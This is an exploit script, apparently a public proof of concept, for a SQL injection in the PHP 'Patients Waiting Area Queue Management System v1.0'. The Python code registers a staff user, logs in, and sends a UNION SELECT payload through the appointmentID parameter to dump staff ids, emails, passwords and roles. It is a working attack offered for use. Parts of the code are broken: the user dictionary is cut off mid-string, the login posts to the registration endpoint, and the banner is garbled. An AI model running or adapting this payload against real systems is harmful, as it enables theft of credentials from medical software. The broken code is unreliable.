# Exploit Author: Deva Parekh (pr0f)
# Date: October 23, 2025
# Vendor Homepage: https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=18348&title=+Patients+Waiting+Area+Queue+Management+System
# Tested on: Kali Linux, Apache, Mysql
# Vendor: sourcecodester
# Version: v1.0
# Exploit Description:
# Patients Waiting Area Queue Management System v1.0 suffers from an SQL Injection that allows an attacker dump contents from the database.
import requests, json, sys
from typing import Sequence, Iterable
def _to_cell_str(value) -> str:
if value is None:
return ""
s = str(value)
return " ".join(s.splitlines())
def _format_cell(text: str, width: int, align: str) -> str:
if align == "right":
return text.rjust(width)
if align == "center":
return text.center(width)
return text.ljust(width)
def print_table(rows: Iterable[Sequence], headers: Sequence = None,
align: Sequence[str] = None, padding: int = 1):
rows = [list(map(_to_cell_str, r)) for r in rows]
ncols = max((len(r) for r in rows), default=0)
if headers:
headers = list(map(_to_cell_str, headers))
ncols = max(ncols, len(headers))
for r in rows:
if len(r) < ncols:
r.extend([""] * (ncols - len(r)))
if headers and len(headers) < ncols:
headers.extend([""] * (ncols - len(headers)))
if not align:
aligns = ["left"] * ncols
else:
aligns = list(align)
if len(aligns) < ncols:
aligns.extend([aligns[-1]] * (ncols - len(aligns)))
col_widths = [0] * ncols
for col in range(ncols):
if headers:
col_widths[col] = max(col_widths[col], len(headers[col]))
for r in rows:
col_widths[col] = max(col_widths[col], len(r[col]))
pad = " " * padding
def make_sep():
parts = ["+"]
for w in col_widths:
parts.append("-" * (w + padding * 2))
parts.append("+")
return "".join(parts)
sep = make_sep()
print(sep)
if headers:
parts = ["|"]
for i in range(ncols):
parts.append(pad + _format_cell(headers[i], col_widths[i], aligns[i]) + pad)
parts.append("|")
print("".join(parts))
print(sep)
for r in rows:
parts = ["|"]
for i in range(ncols):
parts.append(pad + _format_cell(r[i], col_widths[i], aligns[i]) + pad)
parts.append("|")
print("".join(parts))
print(sep)
def register_user(session, user):
headers = {'Content-Type' : 'application/json'}
session.post(f'http://{target}/php/api_register_staff.php', json=user, headers=headers)
def login(session, user):
headers = {'Content-Type' : 'application/x-www-form-urlencoded'}
payload = f'email={user['email']}&password={user['password']}'
session.post(f'http://{target}/php/api_register_staff.php', data=payload, headers=headers)
def exploit_sqli(session):
sql_payload = "5' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,id,email,NULL,password,NULL,NULL,NULL,NULL,NULL,first_name,last_name,role,NULL,is_active from staff-- "
rep = session.get(f'http://{target}/php/api_patient_schedule.php?appointmentID={sql_payload}', allow_redirects=False)
return json.loads(rep.content.decode("utf-8").rstrip())
def convert_to_row(dump):
rows = [(a['time'], a['doctor'], a['appointment_date'], a['reason'], a['fullname'], a['appointment']) for a in dump['appointment']]
return rows
def print_sig():
print('')
print('????????????')
print('??????????? ')
print('? ??????? ')
print('~ https://github.com/pr0f94')
print('~ Patients Waiting Area Queue Management System v1 - union sqli')
print('')
if __name__ == "__main__":
headers = ["id", "first_name last_name", "email", "password", "role", "is_active"]
user = {"firstName":"pr0f","lastName":"pr0f","email":"
print_sig()
target = sys.argv[1]
s = requests.Session()
print('-- Registering new user')
register_user(s, user)
print('-- Logging in as user')
login(s, user)
print('-- Exploiting sqli to dump staff table')
table_dump = exploit_sqli(s)
rows = convert_to_row(table_dump)
print('')
print_table(rows, headers=headers)